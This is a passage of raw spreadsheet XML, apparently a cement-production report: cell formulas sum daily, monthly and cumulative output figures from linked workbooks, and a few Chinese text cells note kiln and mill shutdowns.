        <f>X49+yc!Y49</f>
        <v>176673.4</v>
      </c>
      <c r="Z49" s="238">
        <f>'[13]19'!$Y$8</f>
        <v>10450.565</v>
      </c>
    </row>
    <row r="50" ht="15.75" customHeight="1" spans="1:26">
      <c r="A50" s="191"/>
      <c r="B50" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C50" s="193"/>
      <c r="D50" s="193"/>
      <c r="E50" s="194"/>
      <c r="F50" s="194"/>
      <c r="G50" s="225"/>
      <c r="H50" s="194">
        <f>G50+'18'!H50</f>
        <v>0</v>
      </c>
      <c r="I50" s="194">
        <f>H50+yc!I50</f>
        <v>0</v>
      </c>
      <c r="J50" s="194"/>
      <c r="K50" s="194">
        <f>J50+'18'!K50</f>
        <v>0</v>
      </c>
      <c r="L50" s="194">
        <f>K50+yc!L50</f>
        <v>0</v>
      </c>
      <c r="M50" s="194"/>
      <c r="N50" s="195"/>
      <c r="O50" s="200"/>
      <c r="P50" s="200"/>
      <c r="Q50" s="193" t="s">
        <v>277</v>
      </c>
      <c r="R50" s="237">
        <f>'[13]19'!$P$7</f>
        <v>200</v>
      </c>
      <c r="S50" s="238">
        <f>'[13]19'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T50" s="238">
        <f>'[13]19'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U50" s="234">
        <f>T50+'18'!U50</f>
        <v>0</v>
      </c>
      <c r="V50" s="234">
        <f>U50+yc!V50</f>
        <v>0</v>
      </c>
      <c r="W50" s="235">
        <f>'[13]19'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X50" s="234">
        <f>W50+'18'!X50</f>
        <v>0</v>
      </c>
      <c r="Y50" s="235">
        <f>X50+yc!Y50</f>
        <v>0</v>
      </c>
      <c r="Z50" s="238">
        <f>'[13]19'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="51" ht="15.75" customHeight="1" spans="1:26">
      <c r="A51" s="191" t="s">
        <v>304</v>
      </c>
      <c r="B51" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C51" s="193"/>
      <c r="D51" s="193"/>
      <c r="E51" s="194">
        <v>160000</v>
      </c>
      <c r="F51" s="194">
        <f>'[13]19'!$D$24</f>
        <v>48852.6839999998</v>
      </c>
      <c r="G51" s="225">
        <f>'[13]19'!$E$24</f>
        <v>0</v>
      </c>
      <c r="H51" s="194">
        <f>G51+'18'!H51</f>
        <v>77584.81</v>
      </c>
      <c r="I51" s="194">
        <f>H51+yc!I51</f>
        <v>1453983.81</v>
      </c>
      <c r="J51" s="194">
        <f>'[13]19'!$I$24</f>
        <v>5068.027</v>
      </c>
      <c r="K51" s="194">
        <f>J51+'18'!K51</f>
        <v>93756.669</v>
      </c>
      <c r="L51" s="194">
        <f>K51+yc!L51</f>
        <v>1456880.6</v>
      </c>
      <c r="M51" s="194">
        <f>'[13]19'!$L$24</f>
        <v>32527.0149999998</v>
      </c>
      <c r="N51" s="195">
        <f>M51/45000*100</f>
        <v>72.2822555555551</v>
      </c>
      <c r="O51" s="200"/>
      <c r="P51" s="200"/>
      <c r="Q51" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R51" s="237">
        <f>'[13]19'!$P$30</f>
        <v>8550</v>
      </c>
      <c r="S51" s="238">
        <f>'[13]19'!$Q$30</f>
        <v>3251.37400000001</v>
      </c>
      <c r="T51" s="238">
        <f>'[13]19'!$R$30</f>
        <v>110.66</v>
      </c>
      <c r="U51" s="234">
        <f>T51+'18'!U51</f>
        <v>3621.92</v>
      </c>
      <c r="V51" s="234">
        <f>U51+yc!V51</f>
        <v>66620.391</v>
      </c>
      <c r="W51" s="235">
        <f>'[13]19'!$V$30</f>
        <v>0</v>
      </c>
      <c r="X51" s="234">
        <f>W51+'18'!X51</f>
        <v>3280.688</v>
      </c>
      <c r="Y51" s="235">
        <f>X51+yc!Y51</f>
        <v>63896.925</v>
      </c>
      <c r="Z51" s="238">
        <f>'[13]19'!$Y$30</f>
        <v>3592.60600000001</v>
      </c>
    </row>
    <row r="52" ht="15.75" customHeight="1" spans="1:26">
      <c r="A52" s="191"/>
      <c r="B52" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C52" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D52" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E52" s="194">
        <v>175000</v>
      </c>
      <c r="F52" s="194">
        <f>'[13]19'!$D$19</f>
        <v>105046.44300005</v>
      </c>
      <c r="G52" s="225">
        <f>'[13]19'!$E$19</f>
        <v>2e-11</v>
      </c>
      <c r="H52" s="194">
        <f>G52+'18'!H52</f>
        <v>384.86000000038</v>
      </c>
      <c r="I52" s="194">
        <f>H52+yc!I52</f>
        <v>1383952.11</v>
      </c>
      <c r="J52" s="194">
        <f>'[13]19'!$I$19</f>
        <v>706.547</v>
      </c>
      <c r="K52" s="194">
        <f>J52+'18'!K52</f>
        <v>74461.495</v>
      </c>
      <c r="L52" s="194">
        <f>K52+yc!L52</f>
        <v>1356155.695</v>
      </c>
      <c r="M52" s="194">
        <f>'[13]19'!$L$19</f>
        <v>30969.8080000506</v>
      </c>
      <c r="N52" s="207">
        <f>(M52+M53)/(65000+80000)*100</f>
        <v>21.3584882758969</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'[13]19'!$D$22</f>
        <v>0</v>
      </c>
      <c r="G53" s="225">
        <f>'[13]19'!$E$22</f>
        <v>0</v>
      </c>
      <c r="H53" s="194">
        <f>G53+'18'!H53</f>
        <v>0</v>
      </c>
      <c r="I53" s="194">
        <f>H53+yc!I53</f>
        <v>0</v>
      </c>
      <c r="J53" s="194">
        <f>'[13]19'!$I$22</f>
        <v>0</v>
      </c>
      <c r="K53" s="194">
        <f>J53+'18'!K53</f>
        <v>0</v>
      </c>
      <c r="L53" s="194">
        <f>K53+yc!L53</f>
        <v>0</v>
      </c>
      <c r="M53" s="194">
        <f>'[13]19'!$L$23</f>
        <v>0</v>
      </c>
      <c r="N53" s="212"/>
      <c r="O53" s="200"/>
      <c r="P53" s="223" t="s">
        <v>262</v>
      </c>
      <c r="Q53" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R53" s="245"/>
      <c r="S53" s="237">
        <f>'[14]19'!$M$21+'[14]19'!$M$22+'[14]19'!$M$35</f>
        <v>1648.947</v>
      </c>
      <c r="T53" s="237">
        <f>'[14]19'!$N$21+'[14]19'!$N$22+'[14]19'!$N$35</f>
        <v>0</v>
      </c>
      <c r="U53" s="234">
        <f>T53+'18'!U53</f>
        <v>924.05</v>
      </c>
      <c r="V53" s="234">
        <f>U53+yc!V53</f>
        <v>39258.477</v>
      </c>
      <c r="W53" s="237">
        <f>'[14]19'!$Q$21+'[14]19'!$Q$22+'[14]19'!$Q$35</f>
        <v>0</v>
      </c>
      <c r="X53" s="234">
        <f>W53+'18'!X53</f>
        <v>739</v>
      </c>
      <c r="Y53" s="235">
        <f>X53+yc!Y53</f>
        <v>40230</v>
      </c>
      <c r="Z53" s="237">
        <f>'[14]19'!$T$21+'[14]19'!$T$22+'[14]19'!$T$35</f>
        <v>1833.997</v>
      </c>
    </row>
    <row r="54" ht="15.75" customHeight="1" spans="1:26">
      <c r="A54" s="191"/>
      <c r="B54" s="193"/>
      <c r="C54" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D54" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E54" s="194"/>
      <c r="F54" s="194"/>
      <c r="G54" s="225">
        <f>'[13]19'!$E$23</f>
        <v>0</v>
      </c>
      <c r="H54" s="194">
        <f>G54+'18'!H54</f>
        <v>0</v>
      </c>
      <c r="I54" s="194">
        <f>H54+yc!I54</f>
        <v>0</v>
      </c>
      <c r="J54" s="194">
        <f>'[13]19'!$I$47</f>
        <v>0</v>
      </c>
      <c r="K54" s="194">
        <f>J54+'18'!K54</f>
        <v>10672.645</v>
      </c>
      <c r="L54" s="194">
        <f>K54+yc!L54</f>
        <v>222114.495</v>
      </c>
      <c r="M54" s="194">
        <f>'[13]19'!$L$22</f>
        <v>0</v>
      </c>
      <c r="N54" s="195"/>
      <c r="O54" s="200"/>
      <c r="P54" s="246" t="s">
        <v>263</v>
      </c>
      <c r="Q54" s="242" t="s">
        <v>279</v>
      </c>
      <c r="R54" s="247">
        <f>'[15]19'!$C$43</f>
        <v>0</v>
      </c>
      <c r="S54" s="247">
        <f>'[15]19'!$D$43</f>
        <v>467.66</v>
      </c>
      <c r="T54" s="247">
        <f>'[15]19'!$E$43</f>
        <v>0</v>
      </c>
      <c r="U54" s="234">
        <f>T54+'18'!U54</f>
        <v>0</v>
      </c>
      <c r="V54" s="248">
        <f>U54+yc!V54</f>
        <v>0</v>
      </c>
      <c r="W54" s="249">
        <f>'[15]19'!$H$43</f>
        <v>0</v>
      </c>
      <c r="X54" s="234">
        <f>W54+'18'!X54</f>
        <v>0</v>
      </c>
      <c r="Y54" s="250">
        <f>X54+yc!Y54</f>
        <v>0</v>
      </c>
      <c r="Z54" s="247">
        <f>'[15]19'!$K$43</f>
        <v>467.66</v>
      </c>
    </row>
    <row r="55" ht="15.75" customHeight="1" spans="1:26">
      <c r="A55" s="191"/>
      <c r="B55" s="193"/>
      <c r="C55" s="193"/>
      <c r="D55" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E55" s="194"/>
      <c r="F55" s="194"/>
      <c r="G55" s="225">
        <f>'[13]19'!$E$63</f>
        <v>0</v>
      </c>
      <c r="H55" s="194">
        <f>G55+'18'!H55</f>
        <v>0</v>
      </c>
      <c r="I55" s="194">
        <f>H55+yc!I55</f>
        <v>0</v>
      </c>
      <c r="J55" s="225">
        <f>'[13]19'!$I$63</f>
        <v>706.547</v>
      </c>
      <c r="K55" s="194">
        <f>J55+'18'!K55</f>
        <v>5738.81</v>
      </c>
      <c r="L55" s="194">
        <f>K55+yc!L55</f>
        <v>41174.46</v>
      </c>
      <c r="M55" s="194"/>
      <c r="N55" s="195"/>
      <c r="O55" s="200"/>
      <c r="P55" s="251" t="s">
        <v>310</v>
      </c>
      <c r="Q55" s="252" t="s">
        <v>279</v>
      </c>
      <c r="R55" s="253">
        <f>'[16]19'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S55" s="253">
        <f>'[16]19'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T55" s="253">
        <f>'[16]19'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U55" s="254">
        <f>'[16]19'!$S$7</f>
        <v>0</v>
      </c>
      <c r="V55" s="255">
        <f>'[16]19'!$T$7</f>
        <v>0</v>
      </c>
      <c r="W55" s="256">
        <f>'[16]19'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X55" s="254">
        <f>'[16]19'!$W$7</f>
        <v>0</v>
      </c>
      <c r="Y55" s="257">
        <f>'[16]19'!$X$7</f>
        <v>0</v>
      </c>
      <c r="Z55" s="253">
        <f>'[16]19'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="56" ht="15.75" customHeight="1" spans="1:26">
      <c r="A56" s="191"/>
      <c r="B56" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C56" s="193"/>
      <c r="D56" s="193"/>
      <c r="E56" s="194"/>
      <c r="F56" s="194"/>
      <c r="G56" s="194"/>
      <c r="H56" s="194">
        <f>G56+'18'!H56</f>
        <v>0</v>
      </c>
      <c r="I56" s="194">
        <f>H56+yc!I56</f>
        <v>0</v>
      </c>
      <c r="J56" s="194">
        <f>J57+J60</f>
        <v>0</v>
      </c>
      <c r="K56" s="194">
        <f>J56+'18'!K56</f>
        <v>0</v>
      </c>
      <c r="L56" s="194">
        <f>K56+yc!L56</f>
        <v>0</v>
      </c>
      <c r="M56" s="194"/>
      <c r="N56" s="195"/>
      <c r="O56" s="258" t="s">
        <v>282</v>
      </c>
      <c r="P56" s="259" t="s">
        <v>229</v>
      </c>
      <c r="Q56" s="260" t="str">
        <f>'[8]19'!$Q$62</f>
        <v>1#窑:续停。2#窑:续停。水泥磨:1#磨：10:00-23:10避峰停机；2#磨：10:00-22:10避峰停机；3#磨：10:00-22:10避峰停机；4#磨：8:00-22:10避峰停机。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G57+'18'!H57</f>
        <v>0</v>
      </c>
      <c r="I57" s="194">
        <f>H57+yc!I57</f>
        <v>0</v>
      </c>
      <c r="J57" s="194">
        <f>SUM(J58:J59)</f>
        <v>0</v>
      </c>
      <c r="K57" s="194">
        <f>J57+'18'!K57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G58+'18'!H58</f>
        <v>0</v>
      </c>
      <c r="I58" s="194">
        <f>H58+yc!I58</f>
        <v>0</v>
      </c>
      <c r="J58" s="194"/>
      <c r="K58" s="194">
        <f>J58+'18'!K58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G59+'18'!H59</f>
        <v>0</v>
      </c>
      <c r="I59" s="194">
        <f>H59+yc!I59</f>
        <v>0</v>
      </c>
      <c r="J59" s="194"/>
      <c r="K59" s="194">
        <f>J59+'18'!K59</f>
        <v>0</v>
      </c>
      <c r="L59" s="194">
        <f>K59+yc!L59</f>
        <v>0</v>
      </c>
      <c r="M59" s="194"/>
      <c r="N59" s="195"/>
      <c r="O59" s="263"/>
      <c r="P59" s="264" t="s">
        <v>237</v>
      </c>
      <c r="Q59" s="271" t="str">
        <f>'[8]19'!$Q$65</f>
        <v>窑:正常。A组磨：8:25-24:00避峰停机。D1#磨：正常，D2#磨：正常。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G60+'18'!H60</f>
        <v>0</v>
      </c>
      <c r="I60" s="194">
        <f>H60+yc!I60</f>
        <v>0</v>
      </c>
      <c r="J60" s="194"/>
      <c r="K60" s="194">
        <f>J60+'18'!K60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'[14]19'!$D$6</f>
        <v>37769.1699999999</v>
      </c>
      <c r="G61" s="225">
        <f>'[14]19'!$E$6</f>
        <v>3618</v>
      </c>
      <c r="H61" s="194">
        <f>G61+'18'!H61</f>
        <v>69639</v>
      </c>
      <c r="I61" s="194">
        <f>H61+yc!I61</f>
        <v>1185512</v>
      </c>
      <c r="J61" s="194">
        <f>'[14]19'!$E$21</f>
        <v>4157.01</v>
      </c>
      <c r="K61" s="194">
        <f>J61+'18'!K61</f>
        <v>75046.39</v>
      </c>
      <c r="L61" s="194">
        <f>K61+yc!L61</f>
        <v>1176206.47</v>
      </c>
      <c r="M61" s="194">
        <f>'[14]19'!$H$6</f>
        <v>32361.7799999999</v>
      </c>
      <c r="N61" s="195">
        <f>M61/52000*100</f>
        <v>62.2341923076921</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'[14]19'!$M$11+'[14]19'!$M$12+'[14]19'!$M$13+'[14]19'!$M$14+'[14]19'!$M$15+'[14]19'!$M$16+'[14]19'!$M$17+'[14]19'!$M$18</f>
        <v>18454.634</v>
      </c>
      <c r="G62" s="225">
        <f>'[14]19'!$N$11+'[14]19'!$N$12+'[14]19'!$N$13+'[14]19'!$N$14+'[14]19'!$N$15+'[14]19'!$N$16+'[14]19'!$N$17+'[14]19'!$N$18</f>
        <v>3216</v>
      </c>
      <c r="H62" s="194">
        <f>G62+'18'!H62</f>
        <v>54002</v>
      </c>
      <c r="I62" s="194">
        <f>H62+yc!I62</f>
        <v>889995.456</v>
      </c>
      <c r="J62" s="194">
        <f>'[14]19'!$Q$11+'[14]19'!$Q$12+'[14]19'!$Q$13+'[14]19'!$Q$14+'[14]19'!$Q$15+'[14]19'!$Q$16+'[14]19'!$Q$17+'[14]19'!$Q$18</f>
        <v>2717</v>
      </c>
      <c r="K62" s="194">
        <f>J62+'18'!K62</f>
        <v>50253</v>
      </c>
      <c r="L62" s="194">
        <f>K62+yc!L62</f>
        <v>884725.796</v>
      </c>
      <c r="M62" s="194">
        <f>'[14]19'!$T$11+'[14]19'!$T$12+'[14]19'!$T$13+'[14]19'!$T$14+'[14]19'!$T$15+'[14]19'!$T$16+'[14]19'!$T$17+'[14]19'!$T$18</f>
        <v>22203.634</v>
      </c>
      <c r="N62" s="207">
        <f>(M62+M63)/25000*100</f>
        <v>88.8145359999998</v>
      </c>
      <c r="O62" s="263"/>
      <c r="P62" s="274" t="s">
        <v>252</v>
      </c>
      <c r="Q62" s="271" t="str">
        <f>'[8]19'!$Q$71</f>
        <v>窑:续停。水泥磨:续停。</v>
      </c>
      <c r="R62" s="272"/>
      <c r="S62" s="272"/>
      <c r="T62" s="272"/>
      <c r="U62" s="272"/>
      <c r="V62" s="272"/>
      <c r="W62" s="272"/>
      <c r="X62" s="272"/>
      <c r="Y62" s="272"/>
      <c r="Z62" s="273"/>
    </row>
    <row r="63" ht="15.75" customHeight="1" spans="1:26">
      <c r="A63" s="191"/>
      <c r="B63" s="193"/>
      <c r="C63" s="193"/>
      <c r="D63" s="193" t="s">
        <v>284</v>
      </c>
      <c r="E63" s="194"/>
      <c r="F63" s="194">
        <f>'[14]19'!$M$19+'[14]19'!$M$20</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="G63" s="225">
        <f>'[14]19'!$N$19+'[14]19'!$N$20</f>
        <v>0</v>
      </c>
      <c r="H63" s="194">
        <f>G63+'18'!H63</f>
        <v>0</v>
      </c>
      <c r="I63" s="194">
        <f>H63+yc!I63</f>
        <v>0</v>
      </c>
      <c r="J63" s="194">
        <f>'[14]19'!$Q$19+'[14]19'!$Q$20</f>
        <v>0</v>
      </c>
      <c r="K63" s="194">
        <f>J63+'18'!K63</f>
        <v>0</v>
      </c>
      <c r="L63" s="194">
        <f>K63+yc!L63</f>
        <v>0</v>
      </c>
      <c r="M63" s="194">
        <f>'[14]19'!$T$19+'[14]19'!$T$20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G64+'18'!H64</f>
        <v>0</v>
      </c>
      <c r="I64" s="194">
        <f>H64+yc!I64</f>
        <v>0</v>
      </c>
      <c r="J64" s="194">
        <f>J65</f>
        <v>0</v>
      </c>
      <c r="K64" s="194">
        <f>J64+'18'!K64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G65+'18'!H65</f>
        <v>0</v>
      </c>
      <c r="I65" s="194">
        <f>H65+yc!I65</f>
        <v>0</v>
      </c>
      <c r="J65" s="194">
        <f>SUM(J66:J67)</f>
        <v>0</v>
      </c>
      <c r="K65" s="194">
        <f>J65+'18'!K65</f>
        <v>0</v>
      </c>
      <c r="L65" s="194">
        <f>K65+yc!L65</f>
        <v>0</v>
      </c>
      <c r="M65" s="194"/>
      <c r="N65" s="195"/>
      <c r="O65" s="263"/>
      <c r="P65" s="264" t="s">
        <v>304</v>
      </c>
      <c r="Q65" s="271" t="str">
        <f>'[8]19'!$Q$74</f>
        <v>1#窑:续停；2#窑:20:28点火；1#磨:0:00-24:00库满停机。2#磨:0:00-24:00库满停机。3#磨:0:00-24:00库满停机。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G66+'18'!H66</f>
        <v>0</v>
      </c>
      <c r="I66" s="194">
        <f>H66+yc!I66</f>
        <v>0</v>
      </c>
      <c r="J66" s="194"/>
      <c r="K66" s="194">
        <f>J66+'18'!K66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G67+'18'!H67</f>
        <v>0</v>
      </c>
      <c r="I67" s="194">
        <f>H67+yc!I67</f>
        <v>0</v>
      </c>
      <c r="J67" s="194"/>
      <c r="K67" s="194">
        <f>J67+'18'!K67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'[15]19'!$D$6</f>
        <v>1502.56</v>
      </c>
      <c r="G68" s="194">
        <f>'[15]19'!$E$6</f>
        <v>0</v>
      </c>
      <c r="H68" s="194">
        <f>G68+'18'!H68</f>
        <v>0</v>
      </c>
      <c r="I68" s="194">
        <f>H68+yc!I68</f>
        <v>0</v>
      </c>
      <c r="J68" s="194">
        <f>'[15]19'!$H$6</f>
        <v>0</v>
      </c>
      <c r="K68" s="194">
        <f>J68+'18'!K68</f>
        <v>0</v>
      </c>
      <c r="L68" s="194">
        <f>K68+yc!L68</f>
        <v>0</v>
      </c>
      <c r="M68" s="194">
        <f>'[15]19'!$K$6</f>
        <v>1502.56</v>
      </c>
      <c r="N68" s="195">
        <f>M68/50000*100</f>
        <v>3.00512</v>
      </c>
      <c r="O68" s="263"/>
      <c r="P68" s="264" t="s">
        <v>262</v>
      </c>
      <c r="Q68" s="271" t="str">
        <f>'[8]19'!$Q$77</f>
        <v>1#磨14:00-23:15避峰停机:9.25小时(避峰)。2#磨13:30-24:00避峰停机:10.5小时(避峰)。</v>
      </c>
      <c r="R68" s="272"/>
      <c r="S68" s="272"/>
      <c r="T68" s="272"/>
      <c r="U68" s="272"/>
      <c r="V68" s="272"/>
      <c r="W68" s="272"/>
      <c r="X68" s="272"/>
      <c r="Y68" s="272"/>
      <c r="Z68" s="273"/>
    </row>
    <row r="69" ht="15.75" customHeight="1" spans="1:26">
      <c r="A69" s="191"/>
      <c r="B69" s="193" t="s">
        <v>283</v>
      </c>
      <c r="C69" s="193"/>
      <c r="D69" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E69" s="194"/>
      <c r="F69" s="194">
        <f>'[15]19'!$D$43+'[15]19'!$D$44</f>
        <v>467.66</v>
      </c>
      <c r="G69" s="194">
        <f>'[15]19'!$E$43+'[15]19'!$E$44</f>
        <v>0</v>
      </c>
      <c r="H69" s="194">
        <f>G69+'18'!H69</f>
        <v>0</v>
      </c>
      <c r="I69" s="194">
        <f>H69+yc!I69</f>
        <v>0</v>
      </c>
      <c r="J69" s="194">
        <f>'[15]19'!$H$43+'[15]19'!$H$44</f>
        <v>0</v>
      </c>
      <c r="K69" s="194">
        <f>J69+'18'!K69</f>
        <v>0</v>
      </c>
      <c r="L69" s="194">
        <f>K69+yc!L69</f>
        <v>0</v>
      </c>
      <c r="M69" s="194">
        <f>'[15]19'!$K$43+'[15]19'!$K$44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'[15]19'!$D$45</f>
        <v>0</v>
      </c>
      <c r="G70" s="194">
        <f>'[15]19'!$E$45</f>
        <v>0</v>
      </c>
      <c r="H70" s="194">
        <f>G70+'18'!H70</f>
        <v>0</v>
      </c>
      <c r="I70" s="194">
        <f>H70+yc!I70</f>
        <v>0</v>
      </c>
      <c r="J70" s="194">
        <f>'[15]19'!$H$45</f>
        <v>0</v>
      </c>
      <c r="K70" s="194">
        <f>J70+'18'!K70</f>
        <v>0</v>
      </c>
      <c r="L70" s="194">
        <f>K70+yc!L70</f>
        <v>0</v>
      </c>
      <c r="M70" s="194">
        <f>'[15]19'!$K$45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G71+'18'!H71</f>
        <v>0</v>
      </c>
      <c r="I71" s="194">
        <f>H71+yc!I71</f>
        <v>0</v>
      </c>
      <c r="J71" s="194">
        <f>J72</f>
        <v>0</v>
      </c>
      <c r="K71" s="194">
        <f>J71+'18'!K71</f>
        <v>0</v>
      </c>
      <c r="L71" s="194">
        <f>K71+yc!L71</f>
        <v>0</v>
      </c>
      <c r="M71" s="194"/>
      <c r="N71" s="195"/>
      <c r="O71" s="263"/>
      <c r="P71" s="264" t="s">
        <v>263</v>
      </c>
      <c r="Q71" s="271" t="str">
        <f>'[8]19'!$Q$80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G72+'18'!H72</f>
        <v>0</v>
      </c>
      <c r="I72" s="194">
        <f>H72+yc!I72</f>
        <v>0</v>
      </c>
      <c r="J72" s="194">
        <f>SUM(J73:J74)</f>
        <v>0</v>
      </c>
      <c r="K72" s="194">
        <f>J72+'18'!K72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G73+'18'!H73</f>
        <v>0</v>
      </c>
      <c r="I73" s="194">
        <f>H73+yc!I73</f>
        <v>0</v>
      </c>
      <c r="J73" s="194"/>
      <c r="K73" s="194">
        <f>J73+'18'!K73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G74+'18'!H74</f>
        <v>0</v>
      </c>
      <c r="I74" s="194">
        <f>H74+yc!I74</f>
        <v>0</v>
      </c>
      <c r="J74" s="194"/>
      <c r="K74" s="194">
        <f>J74+'18'!K74</f>
        <v>0</v>
      </c>
      <c r="L74" s="194">
        <f>K74+yc!L74</f>
        <v>0</v>
      </c>
      <c r="M74" s="194"/>
      <c r="N74" s="195"/>
      <c r="O74" s="263"/>
      <c r="P74" s="278" t="s">
        <v>311</v>
      </c>
      <c r="Q74" s="271" t="str">
        <f>'[8]19'!$Q$83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G75+'18'!H75</f>
        <v>0</v>
      </c>
      <c r="I75" s="194">
        <f>H75+yc!I75</f>
        <v>0</v>
      </c>
      <c r="J75" s="241">
        <f>J76</f>
        <v>0</v>
      </c>
      <c r="K75" s="194">
        <f>J75+'18'!K75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G76+'18'!H76</f>
        <v>0</v>
      </c>
      <c r="I76" s="194">
        <f>H76+yc!I76</f>
        <v>0</v>
      </c>
      <c r="J76" s="241">
        <f>SUM(J77:J78)</f>
        <v>0</v>
      </c>
      <c r="K76" s="194">
        <f>J76+'18'!K76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G77+'18'!H77</f>
        <v>0</v>
      </c>
      <c r="I77" s="194">
        <f>H77+yc!I77</f>
        <v>0</v>
      </c>
      <c r="J77" s="241"/>
      <c r="K77" s="194">
        <f>J77+'18'!K77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G78+'18'!H78</f>
        <v>0</v>
      </c>
      <c r="I78" s="194">
        <f>H78+yc!I78</f>
        <v>0</v>
      </c>
      <c r="J78" s="241"/>
      <c r="K78" s="194">
        <f>J78+'18'!K78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'[16]19'!$E$7</f>
        <v>363.54</v>
      </c>
      <c r="H79" s="194">
        <f>G79+'18'!H79</f>
        <v>9596.6</v>
      </c>
      <c r="I79" s="301">
        <f>H79+yc!I79</f>
        <v>156725.07</v>
      </c>
      <c r="J79" s="301">
        <f>'[16]19'!$I$7</f>
        <v>410</v>
      </c>
      <c r="K79" s="194">
        <f>J79+'18'!K79</f>
        <v>9599.5</v>
      </c>
      <c r="L79" s="301">
        <f>K79+yc!L79</f>
        <v>151490.95</v>
      </c>
      <c r="M79" s="301">
        <f>'[16]19'!$L$7</f>
        <v>4881.88</v>
      </c>
      <c r="N79" s="302">
        <f>M79/50000*100</f>
        <v>9.76376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'[16]19'!$R$15</f>
        <v>0</v>
      </c>
      <c r="H80" s="194">
        <f>G80+'18'!H80</f>
        <v>0</v>
      </c>
      <c r="I80" s="301">
        <f>H80+yc!I80</f>
        <v>0</v>
      </c>
      <c r="J80" s="301">
        <f>'[16]19'!$V$15</f>
        <v>0</v>
      </c>
      <c r="K80" s="194">
        <f>J80+'18'!K80</f>
        <v>0</v>
      </c>
      <c r="L80" s="301">
        <f>K80+yc!L80</f>
        <v>0</v>
      </c>
      <c r="M80" s="301">
        <f>'[16]19'!$Y$15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G81+'18'!H81</f>
        <v>0</v>
      </c>
      <c r="I81" s="301">
        <f>H81+yc!I81</f>
        <v>0</v>
      </c>
      <c r="J81" s="301"/>
      <c r="K81" s="194">
        <f>J81+'18'!K81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G82+'18'!H82</f>
        <v>0</v>
      </c>
      <c r="I82" s="301">
        <f>H82+yc!I82</f>
        <v>0</v>
      </c>
      <c r="J82" s="301"/>
      <c r="K82" s="194">
        <f>J82+'18'!K82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G83+'18'!H83</f>
        <v>0</v>
      </c>
      <c r="I83" s="301">
        <f>H83+yc!I83</f>
        <v>0</v>
      </c>
      <c r="J83" s="301"/>
      <c r="K83" s="194">
        <f>J83+'18'!K83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G84+'18'!H84</f>
        <v>0</v>
      </c>
      <c r="I84" s="301">
        <f>H84+yc!I84</f>
        <v>0</v>
      </c>
      <c r="J84" s="301"/>
      <c r="K84" s="194">
        <f>J84+'18'!K84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G85+'18'!H85</f>
        <v>0</v>
      </c>
      <c r="I85" s="301">
        <f>H85+yc!I85</f>
        <v>0</v>
      </c>
      <c r="J85" s="301"/>
      <c r="K85" s="194">
        <f>J85+'18'!K85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20/31</f>
        <v>0.645161290322581</v>
      </c>
      <c r="J2" s="180"/>
      <c r="K2" s="181"/>
      <c r="L2" s="180"/>
      <c r="M2" s="180"/>
      <c r="N2" s="182">
        <v>46011</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18536.04</v>
      </c>
      <c r="H5" s="194">
        <f>G5+'19'!H5</f>
        <v>413580.45</v>
      </c>
      <c r="I5" s="194">
        <f>H5+yc!I5</f>
        <v>6568446.48</v>
      </c>
      <c r="J5" s="194">
        <f>J21+J31+J41+J51+J61+J68+J79</f>
        <v>21985.97</v>
      </c>
      <c r="K5" s="194">
        <f>J5+'19'!K5</f>
        <v>461326.409</v>
      </c>
      <c r="L5" s="194">
        <f>K5+yc!L5</f>
        <v>6611397.54</v>
      </c>
      <c r="M5" s="194">
        <f>M21+M31+M41+M51+M61+M68+M79</f>
        <v>219721.865</v>
      </c>
      <c r="N5" s="195">
        <f>M5/374000*100</f>
        <v>58.7491617647058</v>
      </c>
      <c r="O5" s="196" t="s">
        <v>228</v>
      </c>
      <c r="P5" s="197" t="s">
        <v>229</v>
      </c>
      <c r="Q5" s="193" t="s">
        <v>291</v>
      </c>
      <c r="R5" s="198">
        <f>'[10]20'!$W$101</f>
        <v>0</v>
      </c>
      <c r="S5" s="198">
        <f>'[10]20'!$X$101</f>
        <v>271.294167565063</v>
      </c>
      <c r="T5" s="198">
        <f>'[10]20'!$Y$101</f>
        <v>260.421411059556</v>
      </c>
      <c r="U5" s="198">
        <f>'[10]20'!$T$101</f>
        <v>0</v>
      </c>
      <c r="V5" s="198">
        <f>'[10]20'!$U$101</f>
        <v>48.118125</v>
      </c>
      <c r="W5" s="198">
        <f>'[10]20'!$V$101</f>
        <v>63.7274717514124</v>
      </c>
      <c r="X5" s="198">
        <f>'[10]20'!$Q$101</f>
        <v>0</v>
      </c>
      <c r="Y5" s="198">
        <f>'[10]20'!$R$101</f>
        <v>230.967</v>
      </c>
      <c r="Z5" s="198">
        <f>'[10]20'!$S$101</f>
        <v>5414.286</v>
      </c>
    </row>
    <row r="6" ht="15.75" customHeight="1" spans="1:26">
      <c r="A6" s="191"/>
      <c r="B6" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C6" s="193" t="s">
        <v>232</v>
      </c>
      <c r="D6" s="193"/>
      <c r="E6" s="194"/>
      <c r="F6" s="194">
        <f>'[10]20'!$D$23+'[11]20'!$D$17+'[12]20'!$D$17+'[13]20'!$D$25+'[14]20'!$D$8+'[14]20'!$D$15+'[15]20'!$D$7</f>
        <v>32112.84</v>
      </c>
      <c r="G6" s="194">
        <f>'[10]20'!$E$23+'[11]20'!$E$17+'[12]20'!$E$17+'[13]20'!$E$25+'[14]20'!$E$8+'[14]20'!$E$15+'[15]20'!$E$7</f>
        <v>0</v>
      </c>
      <c r="H6" s="194">
        <f>G6+'19'!H6</f>
        <v>5428</v>
      </c>
      <c r="I6" s="194">
        <f>H6+yc!I6</f>
        <v>281777.96</v>
      </c>
